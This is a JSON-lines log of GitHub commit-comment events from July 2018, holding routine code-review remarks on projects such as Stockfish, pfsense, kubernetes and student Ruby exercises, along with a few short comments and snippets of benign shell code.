{"id":"8004481026","type":"CommitCommentEvent","actor":{"login":"vincent3569"},"repo":{"name":"zenphoto/zenphoto"},"payload":{"comment":{"id":29801590,"position":null,"line":null,"path":null,"commit_id":"2c3b6c2487e3aa82d7892938d111462f239db9f7","created_at":"2018-07-23T14:59:47Z","updated_at":"2018-07-23T14:59:47Z","author_association":"COLLABORATOR","body":"Hi\r\nwhat is supposed to do this commit ?\r\n\r\nin fact:\r\nif options `Require confirmation` and `Data usage confirmation` are checked, I don't have the message above ('I agree to storage and handling of my data by this website.').\r\nI have another checkbox in confirm page, but even if I check again, the contact e-mail is not send.\r\n\r\n![screenshot005](https://user-images.githubusercontent.com/1224809/43084862-cbabe1a8-8e99-11e8-92a0-34b3f903ea3e.png)\r\n"}},"created_at":"2018-07-23T14:59:47Z"}
{"id":"8004484471","type":"CommitCommentEvent","actor":{"login":"petervanderstok"},"repo":{"name":"core-wg/resource-directory"},"payload":{"comment":{"id":29801599,"position":null,"line":null,"path":null,"commit_id":"ff9406b5ef04d1a052721d7b6a9c04b665f3f453","created_at":"2018-07-23T15:00:17Z","updated_at":"2018-07-23T15:00:17Z","author_association":"CONTRIBUTOR","body":"better for me. Do we (the reader know) know what a (full) URI is?"}},"created_at":"2018-07-23T15:00:17Z"}
{"id":"8004486032","type":"CommitCommentEvent","actor":{"login":"shreyaagrawal0809"},"repo":{"name":"shreyaagrawal0809/mp-schools"},"payload":{"comment":{"id":29801602,"position":null,"line":null,"path":null,"commit_id":"413be3e2fdcb3bcdf41f430f783c1c4ac6ba32a2","created_at":"2018-07-23T15:00:30Z","updated_at":"2018-07-23T15:00:30Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-23T15:00:30Z"}
{"id":"8004488275","type":"CommitCommentEvent","actor":{"login":"sterne-jaeger"},"repo":{"name":"sterne-jaeger/kstars"},"payload":{"comment":{"id":29801604,"position":88,"line":2289,"path":"kstars/ekos/capture/capture.cpp","commit_id":"c52640c15f9e621d75059e27d3ecd6785f66fbd3","created_at":"2018-07-23T15:00:50Z","updated_at":"2018-07-23T15:00:50Z","author_association":"OWNER","body":"Yepp, true. I will correct it."}},"created_at":"2018-07-23T15:00:50Z"}
{"id":"8004488582","type":"CommitCommentEvent","actor":{"login":"andycanterbury"},"repo":{"name":"crdschurch/crds-form-builder-frontend"},"payload":{"comment":{"id":29801606,"position":8,"line":15,"path":"src/app/create-form/create-form.component.spec.ts","commit_id":"5bea697ceb695f169ae35a975d23cf83764750ec","created_at":"2018-07-23T15:00:53Z","updated_at":"2018-07-23T15:00:53Z","author_association":"CONTRIBUTOR","body":"Angular n00b question, why doesn't this one have curly brackets? "}},"created_at":"2018-07-23T15:00:53Z"}
{"id":"8004490269","type":"CommitCommentEvent","actor":{"login":"bernars-usa"},"repo":{"name":"usds/us-forms-system"},"payload":{"comment":{"id":29801610,"position":9,"line":15,"path":"docs/building-a-form/common-definitions.md","commit_id":"97e13c77ce19a99de5c9e60a86424331e18aa19e","created_at":"2018-07-23T15:01:09Z","updated_at":"2018-07-23T15:01:09Z","author_association":"CONTRIBUTOR","body":"Not a nit! Thanks for pointing it out! 🙇‍♀️ "}},"created_at":"2018-07-23T15:01:09Z"}
{"id":"8004499373","type":"CommitCommentEvent","actor":{"login":"checcomi"},"repo":{"name":"checcomi/threePGN-package"},"payload":{"comment":{"id":29801621,"position":5,"line":6,"path":"R/3PG.R","commit_id":"830de637d5afcdaca9bd987bcf4ac46fd9f6081c","created_at":"2018-07-23T15:02:30Z","updated_at":"2018-07-23T15:02:30Z","author_association":"OWNER","body":"@trotsiuk climID introduced, now weather can have different size than noOfSites. \r\n"}},"created_at":"2018-07-23T15:02:30Z"}
{"id":"8004499581","type":"CommitCommentEvent","actor":{"login":"neuromancer"},"repo":{"name":"msdsgn/diggers"},"payload":{"comment":{"id":29801622,"position":null,"line":null,"path":null,"commit_id":"c5de67464ca5f20fb2e5da5b09400689df430175","created_at":"2018-07-23T15:02:32Z","updated_at":"2018-07-23T15:02:32Z","author_association":"NONE","body":"I was wondering how to test this remake. Is it still in development?"}},"created_at":"2018-07-23T15:02:32Z"}
{"id":"8004506692","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29801634,"position":null,"line":null,"path":null,"commit_id":"c6a3a7c6bb026b9de6012da0253f09ccb24a8188","created_at":"2018-07-23T15:03:37Z","updated_at":"2018-07-23T15:03:37Z","author_association":"OWNER","body":"Indeed. I entered the correct bounds, than got an error message about something missing which I corrected, but when this happen, the non default settings SPRT are lost.\r\n\r\nLet it run a bit (it might pass anyway ;). Will cancel after 20000 games. "}},"created_at":"2018-07-23T15:03:37Z"}
{"id":"8004507615","type":"CommitCommentEvent","actor":{"login":"sterne-jaeger"},"repo":{"name":"sterne-jaeger/kstars"},"payload":{"comment":{"id":29801637,"position":97,"line":2740,"path":"kstars/ekos/capture/capture.cpp","commit_id":"c52640c15f9e621d75059e27d3ecd6785f66fbd3","created_at":"2018-07-23T15:03:46Z","updated_at":"2018-07-23T15:03:46Z","author_association":"OWNER","body":"Very good point! I will shift it to getTotalFramesCount() as suggested."}},"created_at":"2018-07-23T15:03:46Z"}
{"id":"8004507633","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29801638,"position":null,"line":null,"path":null,"commit_id":"cc2e82e25c81e96903dfe7277e8622197b27f458","created_at":"2018-07-23T15:03:46Z","updated_at":"2018-07-23T15:03:46Z","author_association":"OWNER","body":"Ok. I will try 1 or 2 of those and look for something else. Thx.\n\nOn Mon, Jul 23, 2018, 8:51 AM Rocky640 <notifications@github.com> wrote:\n\n> Are you saying that something like this would not pass as a simplification\n>\n> You can hand fill the master arrays with your best formula values and try\n> some [0, 4]\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/cc2e82e25c81e96903dfe7277e8622197b27f458#commitcomment-29801485>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSGnd-B99EHRjOVC-qkX4KIIqIIYdks5uJeLUgaJpZM4VbFpv>\n> .\n>\n"}},"created_at":"2018-07-23T15:03:46Z"}
{"id":"8004514465","type":"CommitCommentEvent","actor":{"login":"kgninja"},"repo":{"name":"Dodospaces/Dodo1"},"payload":{"comment":{"id":29801653,"position":null,"line":null,"path":null,"commit_id":"6ec9d25687987b534c0ccf1c29577b3c9d703118","created_at":"2018-07-23T15:04:52Z","updated_at":"2018-07-23T15:04:52Z","author_association":"CONTRIBUTOR","body":"[README.md Dodospaces.docx](https://github.com/Dodospaces/Dodo1/files/2219843/README.md.Dodospaces.docx)\r\n"}},"created_at":"2018-07-23T15:04:52Z"}
{"id":"8004519439","type":"CommitCommentEvent","actor":{"login":"Baonguyen7412"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29801666,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T15:05:36Z","updated_at":"2018-07-23T15:05:36Z","author_association":"NONE","body":"Good"}},"created_at":"2018-07-23T15:05:36Z"}
{"id":"8004521150","type":"CommitCommentEvent","actor":{"login":"smissonian"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29801668,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T15:05:52Z","updated_at":"2018-07-23T15:05:52Z","author_association":"NONE","body":"Great Project!!"}},"created_at":"2018-07-23T15:05:52Z"}
{"id":"8004521714","type":"CommitCommentEvent","actor":{"login":"rossdrew"},"repo":{"name":"rossdrew/emuRox"},"payload":{"comment":{"id":29801669,"position":null,"line":null,"path":null,"commit_id":"6ef13098e6116b0b198ff42bbaf46298c269719e","created_at":"2018-07-23T15:05:57Z","updated_at":"2018-07-23T15:05:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [A more flexible, useful internal byte representation](https://trello.com/c/acIYFBe4/215-a-more-flexible-useful-internal-byte-representation)"}},"created_at":"2018-07-23T15:05:57Z"}
{"id":"8004535316","type":"CommitCommentEvent","actor":{"login":"joelgomes1994"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":29801697,"position":null,"line":null,"path":null,"commit_id":"f62dca6f3c8028dc69fff5be439fcc5d90a87124","created_at":"2018-07-23T15:08:02Z","updated_at":"2018-07-23T15:08:02Z","author_association":"NONE","body":"Very nice! \r\nIs there plans for a bge.logic.onExit (to be called just before GE exits)? It would be pretty handy.\r\nNice work!"}},"created_at":"2018-07-23T15:08:02Z"}
{"id":"8004536781","type":"CommitCommentEvent","actor":{"login":"luckman212"},"repo":{"name":"pfsense/pfsense"},"payload":{"comment":{"id":29801701,"position":null,"line":null,"path":null,"commit_id":"37be6b260f8b90393d994c40e2db34925acaa451","created_at":"2018-07-23T15:08:15Z","updated_at":"2018-07-23T15:08:15Z","author_association":"MEMBER","body":"Hmm, that change you made doesn't look like it will work.\r\n\r\nExample, if the rtt is **10**usec, it will print as `0.10ms` which actually == **100**usec.\r\n"}},"created_at":"2018-07-23T15:08:15Z"}
{"id":"8004538719","type":"CommitCommentEvent","actor":{"login":"grant"},"repo":{"name":"gsuitedevs/dotnet-samples"},"payload":{"comment":{"id":29801704,"position":null,"line":null,"path":null,"commit_id":"758921dd1f418c65ae5f750a152448c2a2bad647","created_at":"2018-07-23T15:08:33Z","updated_at":"2018-07-23T15:08:33Z","author_association":"MEMBER","body":"@erickoledadevrel The indentation doesn't look right. Can you autoformat this file and re-upload it?"}},"created_at":"2018-07-23T15:08:33Z"}
{"id":"8004540033","type":"CommitCommentEvent","actor":{"login":"GabrielaTardelli"},"repo":{"name":"GabrielaTardelli/teste3"},"payload":{"comment":{"id":29801709,"position":6,"line":9,"path":"ajustelinear.m","commit_id":"c953d616030020df6f5059e2d9db0e0cdb1096ca","created_at":"2018-07-23T15:08:45Z","updated_at":"2018-07-23T15:08:45Z","author_association":"OWNER","body":"colocamos então nome aos eixos do grafico"}},"created_at":"2018-07-23T15:08:45Z"}
{"id":"8004542188","type":"CommitCommentEvent","actor":{"login":"devakira"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29801714,"position":null,"line":null,"path":null,"commit_id":"db63775e5d8cdcd2c0bbb0a9e0344262a0d680cd","created_at":"2018-07-23T15:09:05Z","updated_at":"2018-07-23T15:09:05Z","author_association":"MEMBER","body":"Why not just put the function in the on_guild_join and on_guild_remove events?"}},"created_at":"2018-07-23T15:09:05Z"}
{"id":"8004546987","type":"CommitCommentEvent","actor":{"login":"AleksandrSmoliak"},"repo":{"name":"AleksandrSmoliak/my_pithon_training"},"payload":{"comment":{"id":29801723,"position":null,"line":null,"path":null,"commit_id":"10cf9890fd13330bc403006a834efa475ad302bc","created_at":"2018-07-23T15:09:50Z","updated_at":"2018-07-23T15:09:50Z","author_association":"OWNER","body":"![18 07 58](https://user-images.githubusercontent.com/39195330/43085373-8e48a4fe-8ea3-11e8-8966-ba3d890e5722.png)\r\n"}},"created_at":"2018-07-23T15:09:50Z"}
{"id":"8004547027","type":"CommitCommentEvent","actor":{"login":"anon44846"},"repo":{"name":"anon44846/JibrilBotManager"},"payload":{"comment":{"id":29801724,"position":null,"line":null,"path":null,"commit_id":"9adb800489ee14029b522d0892ecf5a27a9ccf58","created_at":"2018-07-23T15:09:50Z","updated_at":"2018-07-23T15:09:50Z","author_association":"OWNER","body":"Merge test"}},"created_at":"2018-07-23T15:09:50Z"}
{"id":"8004547196","type":"CommitCommentEvent","actor":{"login":"moham96"},"repo":{"name":"PLi-metas/meta-amlogic"},"payload":{"comment":{"id":29801725,"position":null,"line":null,"path":null,"commit_id":"1ea929f071a991db08592e714331602d1cfc40a1","created_at":"2018-07-23T15:09:52Z","updated_at":"2018-07-23T15:09:52Z","author_association":"CONTRIBUTOR","body":"@persianpros  agreed. I will update it now"}},"created_at":"2018-07-23T15:09:52Z"}
{"id":"8004552041","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29801733,"position":6,"line":22,"path":"code/drasil-lang/Language/Drasil/Printing/LayoutObj.hs","commit_id":"c775812d0e354286d65706b405e7bbb5076b08d2","created_at":"2018-07-23T15:10:37Z","updated_at":"2018-07-23T15:10:37Z","author_association":"COLLABORATOR","body":"In the meeting we had June 19th, it had been decided that `Paragraph`, `Bib` and `Enumeration` should have labels just like all other `Contents`. \r\nHowever, I also agree that labeling `Paragraph`s is overkill, since equations, lists, tables, whole sections, etc. make more sense to refer to."}},"created_at":"2018-07-23T15:10:37Z"}
{"id":"8004552565","type":"CommitCommentEvent","actor":{"login":"huu000000"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29801736,"position":null,"line":null,"path":null,"commit_id":"c24f5c312922a9f5679d908d2a9ee472d13d4eb5","created_at":"2018-07-23T15:10:42Z","updated_at":"2018-07-23T15:10:42Z","author_association":"NONE","body":" ## Running tests"}},"created_at":"2018-07-23T15:10:42Z"}
{"id":"8004557501","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29801750,"position":null,"line":null,"path":null,"commit_id":"c0ef58e9fe78e9d982d48983386763f9d34088bb","created_at":"2018-07-23T15:11:29Z","updated_at":"2018-07-23T15:11:29Z","author_association":"MEMBER","body":"@KalleZ TBH I have no idea what this even is."}},"created_at":"2018-07-23T15:11:29Z"}
{"id":"8004557525","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":29801751,"position":null,"line":null,"path":null,"commit_id":"028d24d667330df9bfbd0818403593f859d3887f","created_at":"2018-07-23T15:11:30Z","updated_at":"2018-07-23T15:11:30Z","author_association":"NONE","body":"wait wtf really?"}},"created_at":"2018-07-23T15:11:30Z"}
{"id":"8004557597","type":"CommitCommentEvent","actor":{"login":"huu000000"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29801752,"position":2,"line":97,"path":"CONTRIBUTING.md","commit_id":"c24f5c312922a9f5679d908d2a9ee472d13d4eb5","created_at":"2018-07-23T15:11:30Z","updated_at":"2018-07-23T15:11:30Z","author_association":"NONE","body":"##Guidelines"}},"created_at":"2018-07-23T15:11:30Z"}
{"id":"8004558527","type":"CommitCommentEvent","actor":{"login":"luckman212"},"repo":{"name":"pfsense/pfsense"},"payload":{"comment":{"id":29801758,"position":null,"line":null,"path":null,"commit_id":"37be6b260f8b90393d994c40e2db34925acaa451","created_at":"2018-07-23T15:11:39Z","updated_at":"2018-07-23T15:11:39Z","author_association":"MEMBER","body":"If you want everything in ms explicitly, you don't need the `if` anymore, just use something like\r\n\r\n```\r\nprint_rtt() {\r\n  usec_to_ms=\"$( expr $1 / 1000 )ms\"\r\n  echo $usec_to_ms\r\n}\r\n```"}},"created_at":"2018-07-23T15:11:39Z"}
{"id":"8004559278","type":"CommitCommentEvent","actor":{"login":"huu000000"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29801761,"position":2,"line":97,"path":"CONTRIBUTING.md","commit_id":"c24f5c312922a9f5679d908d2a9ee472d13d4eb5","created_at":"2018-07-23T15:11:46Z","updated_at":"2018-07-23T15:11:46Z","author_association":"NONE","body":" ## Guidelines"}},"created_at":"2018-07-23T15:11:46Z"}
{"id":"8004565753","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29801773,"position":23,"line":23,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"be917a850a791abbdc4b9d0a3b87273425f0e297","created_at":"2018-07-23T15:12:45Z","updated_at":"2018-07-23T15:12:45Z","author_association":"NONE","body":"вот эта строка приводит вот к этой ошибке при попытке запуска прогрммы:\r\n```\r\n$ ruby main.rb \r\nError: Неправильный формат номера\r\nTraceback (most recent call last):\r\n    6: from main.rb:26:in `<main>'\r\n    5: from .../lesson6/interface.rb:23:in `create'\r\n    4: from .../lesson6/interface.rb:23:in `new'\r\n    3: from .../lesson6/passenger_train.rb:5:in `initialize'\r\n    2: from .../lesson6/train.rb:18:in `initialize'\r\n    1: from .../lesson6/exeption.rb:11:in `init_validate'\r\n.../lesson6/train.rb:93:in `validate!': Неправильный формат номера (RuntimeError)\r\n```\r\nпроисходит это потому что ты в аргументах отправляешь цифры\r\nа регулярные выражения работают со строками\r\nт.е. любые переданные цифры не будут проходить проверку\r\nкстати на сайте Rubular написано \"Your test string:\" (именно строка нужна)\r\nа у тебя передается именно цифра: `PassengerTrain.new(1)` \r\nкроме того если ты посмотришь на свой разрешенный формат, то он явно не разрешает принимать в качестве номера одну цифру"}},"created_at":"2018-07-23T15:12:45Z"}
{"id":"8004566395","type":"CommitCommentEvent","actor":{"login":"broxen"},"repo":{"name":"Segs/Segs"},"payload":{"comment":{"id":29801774,"position":38,"line":28,"path":"Projects/CoX/Servers/MapServer/NetCommandManager.cpp","commit_id":"ea2d0ed5ee85f702b5c6970a8464cbe6cafd257b","created_at":"2018-07-23T15:12:52Z","updated_at":"2018-07-23T15:12:52Z","author_association":"COLLABORATOR","body":"Is this because we sent them already in EntityResponse in this exact order?\r\n\r\nIf you change the order there, does it require a change here?\r\n\r\nAlso then, if these two lists need to match, should we be sending the entire list in EntityResponse like we do here?"}},"created_at":"2018-07-23T15:12:52Z"}
{"id":"8004567972","type":"CommitCommentEvent","actor":{"login":"Pelipoika"},"repo":{"name":"Blackglade/RatedAwesome"},"payload":{"comment":{"id":29801780,"position":null,"line":null,"path":null,"commit_id":"7c79a2d30ef1306d18fc63a760b465a07cccdcd3","created_at":"2018-07-23T15:13:07Z","updated_at":"2018-07-23T15:13:07Z","author_association":"NONE","body":"https://github.com/Pelipoika/TF2-Rollermines not cool bro :/"}},"created_at":"2018-07-23T15:13:07Z"}
{"id":"8004569252","type":"CommitCommentEvent","actor":{"login":"jay24x7"},"repo":{"name":"jay24x7/Test"},"payload":{"comment":{"id":29801783,"position":null,"line":null,"path":null,"commit_id":"73841a1c39f6de1a1e543d210cfc04247f29d10b","created_at":"2018-07-23T15:13:18Z","updated_at":"2018-07-23T15:13:18Z","author_association":"OWNER","body":"check"}},"created_at":"2018-07-23T15:13:18Z"}
{"id":"8004570608","type":"CommitCommentEvent","actor":{"login":"sdj38"},"repo":{"name":"pfsense/pfsense"},"payload":{"comment":{"id":29801785,"position":null,"line":null,"path":null,"commit_id":"37be6b260f8b90393d994c40e2db34925acaa451","created_at":"2018-07-23T15:13:30Z","updated_at":"2018-07-23T15:13:30Z","author_association":"CONTRIBUTOR","body":"Good catch I'll change it. \r\nI am not a shell expert but doesn't it only do integer division? would that just round out to 0 ms if it's below 1000us? I haven't actually used any of these alarms or logs. I am not sure how precise it needs to be. "}},"created_at":"2018-07-23T15:13:30Z"}
{"id":"8004571261","type":"CommitCommentEvent","actor":{"login":"huu000000"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29801786,"position":1,"line":88,"path":".circleci/format","commit_id":"d9eecb760ccd5016f3a46f4b56c121355f455d32","created_at":"2018-07-23T15:13:36Z","updated_at":"2018-07-23T15:13:36Z","author_association":"NONE","body":"Exit 1"}},"created_at":"2018-07-23T15:13:36Z"}
{"id":"8004572044","type":"CommitCommentEvent","actor":{"login":"mofu-u"},"repo":{"name":"mofu-u/alarm"},"payload":{"comment":{"id":29801789,"position":null,"line":null,"path":null,"commit_id":"7205973c69f489056c32646d05e92ad82d8fa7d0","created_at":"2018-07-23T15:13:43Z","updated_at":"2018-07-23T15:13:43Z","author_association":"OWNER","body":"今回の課題で記述したPythonのソースコード"}},"created_at":"2018-07-23T15:13:43Z"}
{"id":"8004575550","type":"CommitCommentEvent","actor":{"login":"Levovar"},"repo":{"name":"lmdaly/kubernetes"},"payload":{"comment":{"id":29801801,"position":15,"line":65,"path":"pkg/kubelet/cm/devicemanager/types.go","commit_id":"53e4b8b4cf53b925f333509e0cab359af5dfdeba","created_at":"2018-07-23T15:14:14Z","updated_at":"2018-07-23T15:14:14Z","author_association":"NONE","body":"shouldn't the HintProvider classes just implement the function GetNUMAHints(pod v1.Pod, container v1.Container) NumaMask instead of referencing the interface?\r\nlike its done in the stub of DevieManager"}},"created_at":"2018-07-23T15:14:14Z"}
{"id":"8004580091","type":"CommitCommentEvent","actor":{"login":"huu000000"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29801809,"position":5,"line":92,"path":".circleci/format","commit_id":"d9eecb760ccd5016f3a46f4b56c121355f455d32","created_at":"2018-07-23T15:14:55Z","updated_at":"2018-07-23T15:14:55Z","author_association":"NONE","body":"#!/usr/bin/env bash\r\n## Formatting check script for CircleCI\r\n##\r\n## Copyright (c) 2012-2014 Sylvain Benner\r\n## Copyright (c) 2014-2018 Sylvain Benner & Contributors\r\n##\r\n## Author: Eugene Yaremenko\r\n## URL: https://github.com/syl20bnr/spacemacs\r\n##\r\n## This file is not part of GNU Emacs.\r\n##\r\n## License: GPLv3\r\n\r\nDIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\r\nsource \"${DIR}/shared\"\r\n\r\nif [[ -z \"${CIRCLE_PR_NUMBER// }\" ]]; then\r\n    echo \"Skipping formatting check for branch update.\"\r\n    exit 0"}},"created_at":"2018-07-23T15:14:55Z"}
{"id":"8004580102","type":"CommitCommentEvent","actor":{"login":"gchanan"},"repo":{"name":"pytorch/pytorch"},"payload":{"comment":{"id":29801810,"position":4,"line":4,"path":"aten/src/ATen/native/cuda/CUDAScalar.cu","commit_id":"c082a7839942ea0f8826a36ce00c9418419b16da","created_at":"2018-07-23T15:14:56Z","updated_at":"2018-07-23T15:14:56Z","author_association":"CONTRIBUTOR","body":"I assume this should be a more general thing?"}},"created_at":"2018-07-23T15:14:56Z"}
{"id":"8004581642","type":"CommitCommentEvent","actor":{"login":"sscalpone"},"repo":{"name":"flang-compiler/f18"},"payload":{"comment":{"id":29801814,"position":null,"line":null,"path":null,"commit_id":"1000717da820d87b330719034281a69eaf37bb89","created_at":"2018-07-23T15:15:11Z","updated_at":"2018-07-23T15:15:11Z","author_association":"CONTRIBUTOR","body":"Builds fine for me on linux x86_64 with GCC 7.3.  I'm using up-to-date source as of today.  Fresh build."}},"created_at":"2018-07-23T15:15:11Z"}
{"id":"8004584614","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29801819,"position":16,"line":16,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/exeption.rb","commit_id":"be917a850a791abbdc4b9d0a3b87273425f0e297","created_at":"2018-07-23T15:15:39Z","updated_at":"2018-07-23T15:15:39Z","author_association":"NONE","body":"не очень правильное решение\r\nпо сути ты вызываешь в инишиалайз класса валидацию и тут же ее обрабатываешь в этом же методе\r\nправильно было бы отлавливать ошибку в вызывающем коде\r\nсоздание объектов у тебя вызывается в классе Интерфейс\r\nвот именно там и должен быть отлов ошибок\r\n"}},"created_at":"2018-07-23T15:15:39Z"}
{"id":"8004585911","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29801822,"position":null,"line":null,"path":null,"commit_id":"5c9dd3f3939bfc7929fdf213ef6f89044f3e6e98","created_at":"2018-07-23T15:15:51Z","updated_at":"2018-07-23T15:15:51Z","author_association":"OWNER","body":"@snicolet Would you prefer that I stop this LTC?  Comparing the current LTC results (with the passed tweak and simplification merged) to the previous (simplification only merged), there appears to be evidence that this [0, 5] performs better with the [0, 4] already included.\r\n\r\nThe simplification failed LTC with the tweak included.  I could cancel my test and re-run it against the passed [0, 4] only, with or without the simplification included in the new [0, 5]."}},"created_at":"2018-07-23T15:15:51Z"}
{"id":"8004587023","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29801829,"position":16,"line":16,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/exeption.rb","commit_id":"be917a850a791abbdc4b9d0a3b87273425f0e297","created_at":"2018-07-23T15:16:02Z","updated_at":"2018-07-23T15:16:02Z","author_association":"NONE","body":"и еще обрати внимание на вот этот пункт ТЗ: \"Если введенные данные невалидные, то программа должна вывести сообщение о возникших ошибках и заново запросить данные у пользователя. Реализовать это через механизм обработки исключений\""}},"created_at":"2018-07-23T15:16:02Z"}
{"id":"8004590085","type":"CommitCommentEvent","actor":{"login":"Levovar"},"repo":{"name":"lmdaly/kubernetes"},"payload":{"comment":{"id":29801837,"position":15,"line":139,"path":"pkg/kubelet/cm/devicemanager/manager.go","commit_id":"53e4b8b4cf53b925f333509e0cab359af5dfdeba","created_at":"2018-07-23T15:16:30Z","updated_at":"2018-07-23T15:16:30Z","author_association":"NONE","body":"so I guess they question is, how do we want to figure out which DP is NUMA aware, and which is not? :)\r\n\r\nmaybe DevicePlugin interface should contain a \"IsNumaAware\" bool function every DP must implement?\r\n"}},"created_at":"2018-07-23T15:16:30Z"}
{"id":"8004593552","type":"CommitCommentEvent","actor":{"login":"ozoztakatomo"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29801847,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T15:17:02Z","updated_at":"2018-07-23T15:17:02Z","author_association":"NONE","body":"Good"}},"created_at":"2018-07-23T15:17:02Z"}
{"id":"8004595420","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"v3rba/RubyWay"},"payload":{"comment":{"id":29801850,"position":19,"line":19,"path":"lesson 1/discriminant.rb","commit_id":"0bf7fd79c3b7046601530aa10994dc0c1dd73be1","created_at":"2018-07-23T15:17:18Z","updated_at":"2018-07-23T15:17:18Z","author_association":"NONE","body":"Ты трижды вычисляешь дискриминант и дважды корень из него, это не рационально. Вычисли и занеси в переменную, потом используй эту переменную."}},"created_at":"2018-07-23T15:17:18Z"}
{"id":"8004597424","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"v3rba/RubyWay"},"payload":{"comment":{"id":29801855,"position":16,"line":16,"path":"lesson 1/discriminant.rb","commit_id":"0bf7fd79c3b7046601530aa10994dc0c1dd73be1","created_at":"2018-07-23T15:17:37Z","updated_at":"2018-07-23T15:17:37Z","author_association":"NONE","body":"Таб должен быть 2 пробела, а не 4, Нужно настроить редактор"}},"created_at":"2018-07-23T15:17:37Z"}
{"id":"8004597696","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29801857,"position":44,"line":44,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/route.rb","commit_id":"be917a850a791abbdc4b9d0a3b87273425f0e297","created_at":"2018-07-23T15:17:40Z","updated_at":"2018-07-23T15:17:40Z","author_association":"NONE","body":"объясни мне пожалуйста что проверяет и зачем вот эта валидация"}},"created_at":"2018-07-23T15:17:40Z"}
{"id":"8004600617","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29801862,"position":37,"line":338,"path":"application/helpers/SurveyRuntimeHelper.php","commit_id":"e5ec3c1d48beaa64435d3c932b18e61eff8a5553","created_at":"2018-07-23T15:18:08Z","updated_at":"2018-07-23T15:18:08Z","author_association":"CONTRIBUTOR","body":"this condition is too weak. In some cases, in \"all in one\" mode, it shows again and again the same questions of the first group. "}},"created_at":"2018-07-23T15:18:08Z"}
{"id":"8004600693","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"v3rba/RubyWay"},"payload":{"comment":{"id":29801863,"position":14,"line":8,"path":"lesson 1/triangle2.rb","commit_id":"0bf7fd79c3b7046601530aa10994dc0c1dd73be1","created_at":"2018-07-23T15:18:09Z","updated_at":"2018-07-23T15:18:09Z","author_association":"NONE","body":"Значения могут быть также дробными"}},"created_at":"2018-07-23T15:18:09Z"}
{"id":"8004605583","type":"CommitCommentEvent","actor":{"login":"Neoplatonist"},"repo":{"name":"mrmajik45/website"},"payload":{"comment":{"id":29801877,"position":null,"line":null,"path":null,"commit_id":"8acc23572e3dd292aa5e2835ed280e3dc98fc1b2","created_at":"2018-07-23T15:18:55Z","updated_at":"2018-07-23T15:18:55Z","author_association":"COLLABORATOR","body":"fixes #2 "}},"created_at":"2018-07-23T15:18:55Z"}
{"id":"8004608112","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29801880,"position":null,"line":null,"path":null,"commit_id":"0b19dfd3c62937f82f5bd52f57f198300a12052c","created_at":"2018-07-23T15:19:20Z","updated_at":"2018-07-23T15:19:20Z","author_association":"NONE","body":"Congrats!  Could you open a pull request for this? :-)"}},"created_at":"2018-07-23T15:19:20Z"}
{"id":"8004608898","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"v3rba/RubyWay"},"payload":{"comment":{"id":29801883,"position":41,"line":16,"path":"lesson 1/triangle2.rb","commit_id":"0bf7fd79c3b7046601530aa10994dc0c1dd73be1","created_at":"2018-07-23T15:19:28Z","updated_at":"2018-07-23T15:19:28Z","author_association":"NONE","body":"Прямоугольный треугольник тоже может быть равнобедренным :smile\r\nУ тебя этот случай не предусмотрен"}},"created_at":"2018-07-23T15:19:28Z"}
